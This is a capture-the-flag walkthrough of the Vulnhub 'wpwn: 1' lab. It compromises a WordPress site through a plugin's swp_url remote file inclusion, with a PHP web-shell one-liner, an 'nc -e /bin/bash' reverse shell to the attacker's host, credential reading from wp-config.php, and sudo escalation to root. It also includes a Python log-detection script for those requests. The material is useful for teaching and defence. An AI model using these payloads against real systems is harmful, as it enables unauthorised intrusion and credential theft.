Today we will take a look at Vulnhub: wpwn: 1. My goal in sharing this writeup is to show you the way if you get stuck. Please try to understand each step and take notes.

- Network scan
sudo nmap -p- -sCV --open 192.168.213.123
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 59:b7:db:e0:ba:63:76:af:d0:20:03:11:e1:3c:0e:34 (RSA)
| 256 2e:20:56:75:84:ca:35:ce:e3:6a:21:32:1f:e7:f5:9a (ECDSA)
|_ 256 0d:02:83:8b:1a:1c:ec:0f:ae:74:cc:7b:da:12:89:9e (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
- Gobuster
gobuster dir -u http://192.168.213.123 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.213.123
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/06/05 18:50:16 Starting gobuster in directory enumeration mode
===============================================================
/wordpress (Status: 301) [Size: 322]
- Wpscan
wpscan --url http://192.168.213.123/wordpress

- Reverse Shell
Command: nano exploit.php
<pre>system($_GET[rce])</pre>
Command: curl 'http://192.168.213.123/wordpress/wp-admin/admin-post.php?rce=id&swp_debug=load_options&swp_url=http://192.168.49.213:1337/exploit.php'

http://192.168.213.123/wordpress/wp-admin/admin-post.php?rce=nc%20-e%20/bin/bash%20Your_IP%204242&swp_debug=load_options&swp_url=http://192.168.49.213:1337/exploit.php
# Change IP
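A detection-side view of the request used above, as an added example that is not part of the original writeup: it scans Apache combined-format access log lines for admin-post.php requests that set swp_debug=load_options together with swp_url, and reports the URL the server was asked to fetch. The log lines are constructed samples using this page's lab addresses, and the function name is hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache combined log: src ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def find_swp_url_requests(lines):
    """Hypothetical helper: return (src, status, fetched_url, other_params) for each
    admin-post.php request that sets swp_debug=load_options together with swp_url."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/wp-admin/admin-post.php"):
            continue
        # parse_qs percent-decodes, so encoded variants are matched as well
        params = parse_qs(parts.query, keep_blank_values=True)
        if "load_options" not in params.get("swp_debug", []) or "swp_url" not in params:
            continue
        others = {k: v for k, v in params.items() if k not in ("swp_debug", "swp_url")}
        hits.append((m.group("src"), int(m.group("status")), params["swp_url"][0], others))
    return hits

# Constructed sample log lines (not captured from the target).
SAMPLE_LOG = [
    '192.168.49.213 - - [05/Jun/2022:18:55:01 +0000] "GET /wordpress/ HTTP/1.1" 200 3021 "-" "curl/7.74.0"',
    '192.168.49.213 - - [05/Jun/2022:18:56:10 +0000] "GET /wordpress/wp-admin/admin-post.php'
    '?rce=id&swp_debug=load_options&swp_url=http://192.168.49.213:1337/exploit.php HTTP/1.1" 200 54 "-" "curl/7.74.0"',
    '192.168.213.50 - - [05/Jun/2022:19:00:00 +0000] "POST /wordpress/wp-admin/admin-post.php'
    '?action=save HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '192.168.49.213 - - [05/Jun/2022:19:01:30 +0000] "GET /wordpress/wp-admin/admin-post.php'
    '?swp_url=http%3A%2F%2F192.168.49.213%3A1337%2Fexploit.php&swp_debug=load_options HTTP/1.1" 200 0 "-" "curl/7.74.0"',
]

if __name__ == "__main__":
    for src, status, url, others in find_swp_url_requests(SAMPLE_LOG):
        print(f"{src} status={status} swp_url={url} extra_params={others}")
```

The extra parameters returned with each hit show what was passed along to the fetched file, which is useful when triaging the request.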
- Takis
After login
Command: script /dev/null -c bash
Command: export TERM=xterm
ctrl+z
Command: stty raw -echo ; fg
Command: reset
Takis’s password
We see the password in the wp-config.php file in the /var/www/html/wordpress folder.
Command: cat wp-config.php

Command: su Takis
- Root
Command: sudo -l
(ALL) NOPASSWD: ALL
Command: sudo su

And now we are root.

“If you have any questions or comments, please do not hesitate to write. Have a good day.”